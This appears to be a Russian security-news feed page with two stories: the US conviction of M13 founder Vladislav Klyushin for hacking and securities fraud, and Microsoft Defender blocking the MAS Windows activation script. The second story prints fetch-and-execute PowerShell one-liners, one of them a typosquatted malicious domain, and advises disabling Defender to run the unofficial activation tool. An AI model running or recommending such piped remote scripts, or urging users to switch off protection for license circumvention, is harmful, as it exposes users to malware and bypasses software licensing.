Создателя системы мониторинга для Кремля признали виновным в США

Создателя системы мониторинга для Кремля признали виновным в США

Создателя системы мониторинга для Кремля признали виновным в США

Суд в Бостоне признал российского ИТ-бизнесмена Владислава Клюшина виновным в преступном сговоре и мошенничестве с ценными бумагами. Ему грозит 40 лет тюрьмы. Компания “М13”, которую основал Клюшин, создала для Кремля систему мониторинга СМИ.

О решение присяжных сообщает Reuters. Клюшину вменяют проникновение в сети организаций, помогающих компаниям подавать отчеты в регулирующие органы США. По версии следствия, Клюшин использовал украденную информацию и заработал десятки миллионов долларов на бирже.

Судебное разбирательство длилось в федеральном суде в Бостоне две недели. Клюшина признали виновным по всем пунктам обвинения.

Сторона обвинения утверждает, что хакеры украли имена пользователей и пароли сотрудников двух базирующихся в США компаний, которые подают документы в Комиссию по ценным бумагам и биржам. Подозреваемые взломали компьютеры и получили данные сотен компаний, в том числе Microsoft и Tesla. По версии прокуратуры, кибервзломщики смогли провернуть схемы и получить около $90 млн.

Адвокат Клюшин заявил, что его подзащитный не был участником этих схем.

“Мы разочарованы, но уважаем вердикт присяжных, — сообщил юрист Максим Немцев. — Мы намерены обжаловать различные вопросы, включая допустимость предвзятых статистических доказательств”.

Приговор должны огласить 4 мая.

Владислав Клюшин — единственный арестованный среди участников предполагаемой схемы. Его задержали в Швейцарии во время лыжной прогулки в марте 2021 года по запросу американского Минюста. В августе 2022 года сообщалось, что Клюшина могут внести в список на обмен заключенными между РФ и США.

Еще четверо подозреваемых — бывший сотрудник “М13” Иван Ермаков, Николай Румянцев, Михаил (Микка) Ирзак, Игорь Сладков — остаются на свободе.

Минюст США предъявил обвинение пяти гражданам России в декабре 2021 года. Тогда заявлялась, что 42х-летний Клюшин раньше служил в ГРУ, а в 2018 году начал работать в московской ИТ-компании M13. Последняя, согласно документам, занималась тестированием на проникновение (пентест) и эмуляцией действий APT-групп (целевых атак).

Главным продуктом “М13” стала система мониторинга СМИ, мессенджеров и соцсетей под названием “Катюша”. Решения “М13” использовались в администрации президента, правительстве. В январе 2021 года “М13” выиграла новый контракт на мониторинг СМИ, заказчиком было Минцифры, следует из данных госзакупок. Сумма контракта — почти 300 млн руб.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru